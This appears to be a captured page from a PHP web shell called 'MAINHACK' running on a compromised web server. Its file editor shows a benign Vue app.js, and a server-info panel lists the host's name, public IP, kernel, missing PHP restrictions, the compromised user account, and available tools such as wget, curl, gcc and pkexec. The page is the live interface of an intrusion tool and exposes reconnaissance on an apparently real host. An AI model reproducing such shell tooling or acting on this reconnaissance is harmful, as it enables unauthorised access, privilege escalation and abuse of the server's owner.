[
MAINHACK
]
Mail Test
BC
Config Scan
HOME
Create...
New File
New Folder
Viewing / Editing File: app.js
/** * First we will load all of this project's JavaScript dependencies which * includes Vue and other libraries. It is a great starting point when * building robust, powerful web applications using Vue and Laravel. */ import {createApp} from 'vue'; import DefaultComponent from "./components/DefaultComponent"; import router from './router'; import store from './store'; import axios from 'axios'; import i18n from "./i18n"; import Toast from "vue-toastification"; import "vue-toastification/dist/index.css"; import VueSimpleAlert from "vue3-simple-alert"; import VueNextSelect from 'vue-next-select'; import 'vue-next-select/dist/index.css'; import VueApexCharts from "vue3-apexcharts"; import ENV from './config/env'; /* Start tooltip alert code */ const options = { timeout: 2000, closeOnClick: true, pauseOnFocusLoss: true, pauseOnHover: true, draggable: true, draggablePercent: 0.6, showCloseButtonOnHover: false, hideProgressBar: false, closeButton: "button", icon: true, rtl: false }; /* End tooltip alert code */ /* Start axios code*/ const API_URL = ENV.API_URL; const API_KEY = ENV.API_KEY; axios.defaults.baseURL = API_URL + '/api'; axios.interceptors.request.use( config => { config.headers['x-api-key'] = API_KEY; if (localStorage.getItem('vuex')) { const vuex = JSON.parse(localStorage.getItem('vuex')); const token = vuex.auth.authToken; const language = vuex.globalState.lists.language_code; config.headers['Authorization'] = token ? `Bearer ${token}` : ''; config.headers['x-localization'] = language; } return config; }, error => Promise.reject(error), ); /* End axios code */ const app = createApp({}); app.component('default-component', DefaultComponent); app.component('vue-select', VueNextSelect) app.use(router) app.use(store) app.use(VueSimpleAlert) app.use(VueApexCharts) app.use(Toast, options) app.use(i18n) app.mount('#app');
Save Changes
Cancel / Back
Close ×
Server Info
Hostname: server1.winmanyltd.com
Server IP: 203.161.60.52
PHP Version: 8.3.27
Server Software: Apache
System: Linux server1.winmanyltd.com 4.18.0-553.22.1.el8_10.x86_64 #1 SMP Tue Sep 24 05:16:59 EDT 2024 x86_64
HDD Total: 117.98 GB
HDD Free: 60.08 GB
Domains on IP: N/A (Requires external lookup)
System Features
Safe Mode:
Off
disable_functions:
None
allow_url_fopen:
On
allow_url_include:
Off
magic_quotes_gpc:
Off
register_globals:
Off
open_basedir:
None
cURL:
Enabled
ZipArchive:
Enabled
MySQLi:
Enabled
PDO:
Enabled
wget:
Yes
curl (cmd):
Yes
perl:
Yes
python:
Yes (py3)
gcc:
Yes
pkexec:
Yes
git:
Yes
User Info
Username: eliosofonline
User ID (UID): 1002
Group ID (GID): 1003
Script Owner UID: 1002
Current Dir Owner: 1002